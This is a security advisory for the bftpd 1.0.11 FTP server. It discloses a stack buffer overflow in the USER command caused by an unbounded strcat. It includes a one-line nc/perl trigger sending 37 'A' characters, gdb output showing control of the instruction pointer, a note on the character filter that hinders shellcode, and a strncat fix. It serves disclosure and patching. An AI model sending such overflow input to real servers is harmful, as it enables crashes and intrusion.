[ SOURCE: http://www.secureroot.com/security/advisories/9735754081.html ]

Subject         : Potential security problem in bftpd (Buffer Overflow)

Author          : Christophe BAILLEUX (cb@grolier.fr)

Plateforms      : *nix

Test version    : bftpd-1.0.11





I.      Introduction



bftpd is a Linux FTP server with chroot and setreuid. Not all FTP commands

are included.

It accesses either the user's home directory or its.

ftp subdirectory, and user authentication is via passwd/shadow or PAM.





II.      Problem



The lastest version of bftp has a potential security problem when

entering the USER command.

The problem is a potential Overflow Vulnerability when entering more 35

characteres in USER command.





III.     Details/Demo





a) Code problem



bftpd-1.0.11/commands.c



   102  void command_user(char *username) {

   103    char *alias;

   104    char name[USERLEN + 7] = "ALIAS_";

   105    if(state) {

   106      fprintf(stderr, "503 Username already given.\r\n");

   107      return;

   108    }

   109    alias = (char *) config_getoption(strcat(name, username));

   110    if(alias[0] != '\0')





b) Demo / gdb output





tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21





tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613

GNU gdb 5.0

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for

details.

This GDB was configured as "i386-slackware-linux"...

(no debugging symbols found)...

Attaching to program: /usr/sbin/bftpd, Pid 6624

Reading symbols from /lib/libcrypt.so.1...done.

Loaded symbols for /lib/libcrypt.so.1

Reading symbols from /lib/libc.so.6...done.

Loaded symbols for /lib/libc.so.6

Reading symbols from /lib/ld-linux.so.2...done.

Loaded symbols for /lib/ld-linux.so.2

0x400e7514 in read () from /lib/libc.so.6

(gdb) c

Continuing.



Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb)

(gdb) x $esp

0xbffffcb8:     0x41414141

(gdb)









IV.      Exploit





It's not possible to exploit it with a standart exploit...

commands.c contains a piece of code filtering non-writable chars, eg : NOP, shellcode...





   469    for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer

garbage

 */

   470      if(str[i] < 32) {

   471        memmove((char *) ((int) str + i),

   472                (char *) ((int) str + i + 1),

   473                strlen(str) - i);

   474        i--; /* If junk is found, don't increment counter in next

loop. */

   475      }

   476    }





V.      Workaround



In bftpd-1.0.11/commands.c



Modify the line 109



alias = (char *) config_getoption(strcat(name, username));



by



alias = (char *) config_getoption(strncat(name, username, USERLEN));





bftpd team has been informed.









VI. Greetings :)



Greetings to kalou, kli deda, Geudou deda and all DEDA TEAM!@# :)

Thanks bdev for your help :)





Best regards,





--

BAILLEUX Christophe - Network & System Security Engineer

Grolier Interactive Europe-OG/CS

Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr